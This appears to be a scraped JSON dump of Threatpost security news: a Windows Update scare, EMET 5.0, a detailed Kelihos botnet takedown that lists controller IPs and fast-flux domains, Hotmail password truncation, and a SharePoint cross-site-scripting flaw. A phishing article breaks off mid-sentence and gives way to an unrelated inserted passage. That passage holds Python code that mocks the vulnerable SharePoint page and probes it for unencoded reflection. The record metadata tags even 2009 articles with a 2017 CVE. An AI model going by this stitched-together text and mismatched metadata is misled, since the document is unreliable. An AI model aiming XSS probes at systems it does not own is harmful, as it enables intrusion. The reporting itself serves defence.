\n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. 
The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>)_ reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. 
They suggest, according to the _Post_ article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. 
We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that they will be shipping three critical and five important bulletins in the May edition of patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes Microsoft Office, Windows, .NET Framework, and Silverlight. 
The bugs that will be fixed this month will affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. 
With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged and analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. 
\u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released [an announcement](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to 
attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. 
Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. 
Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USER\\Software\\Google together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer sends 250 of its entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \n\nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. 
A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. 
Being able to track bootstrapping and job messages for an intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extent how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of their real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. 
We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. 
[Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Price, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. 
After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and was wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. 
Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. 
Depending upon which hash function is being used, and what kind of hardware is used to do the cracking, the length of time needed to crack a password hash can vary greatly.\n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said.\n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft._\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "The U.S. has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. 
The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines that are cleaned of bots by using the company\u2019s Malicious Software Removal Tool. The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&C servers. 
However, while the takedown was something of a coup, Waledac was not the top spam botnet and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot, are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation kit to create their own Rimecud botnets. Rimecud is the primary malware family behind the so-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets in that it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. 
The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies.\n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits. Other kits are developed by individual groups and sold like legitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report.\n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could give an attacker the ability to execute arbitrary JavaScript in a victim\u2019s browser in the context of the SharePoint site. 
\n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit.\n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d script to properly sanitize user-supplied input in \u201ccid0\u201d variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability.\n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks, such as scams tied to current events, and newer, stealthier tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. 
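The advisory above names the page and the parameter but not how to check your own instance without firing a script payload. The following is an added example, not High-Tech Bridge\u2019s proof of concept and not SharePoint code: a Python stand-in for a help page that reflects `cid0` unencoded, the same page with HTML encoding applied before the value reaches the markup, and a probe that sends a random canary wrapped around the four characters that matter in text and attribute contexts and reports which of them come back raw. The page markup, the handler names and the canary format are this example\u2019s assumptions; only the path `/_layouts/help.aspx` and the parameter `cid0` come from the advisory.

```python
# Added example, not High-Tech Bridge's PoC or SharePoint code. Only the path
# and the parameter name come from the advisory; the markup is made up.
import html
import re
import secrets
from urllib.parse import parse_qs, quote, urlsplit

HELP_PATH = "/_layouts/help.aspx"
PARAM = "cid0"
SPECIALS = '<>"\''   # characters that break out of text and attribute contexts


def _param(url: str, name: str) -> str:
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def vulnerable_help_page(url: str) -> str:
    """Reflects cid0 into an attribute and into text without encoding."""
    cid = _param(url, PARAM)
    return f'<html><body><div id="help" data-cid="{cid}">Help topic: {cid}</div></body></html>'


def hardened_help_page(url: str) -> str:
    """Same page; the untrusted value is HTML-encoded (quotes included) before
    it reaches either context."""
    cid = html.escape(_param(url, PARAM), quote=True)
    return f'<html><body><div id="help" data-cid="{cid}">Help topic: {cid}</div></body></html>'


def raw_reflection(render, path: str = HELP_PATH, param: str = PARAM) -> set:
    """Return the set of SPECIALS that the page reflects unencoded.
    `render` is any callable that turns a request URL into response HTML; in a
    real check it would be an HTTP GET against your own instance. The canary is
    unique per run so a cached or pre-existing page cannot produce a false hit."""
    token = secrets.token_hex(4)
    canary = f"{token}{SPECIALS}{token}"
    page = render(f"{path}?{param}={quote(canary, safe='')}")
    found = set()
    for m in re.finditer(re.escape(token) + r"(.*?)" + re.escape(token), page):
        found |= set(m.group(1)) & set(SPECIALS)
    return found


if __name__ == "__main__":
    print("vulnerable:", raw_reflection(vulnerable_help_page) or "none")
    print("hardened:  ", raw_reflection(hardened_help_page) or "none")
```

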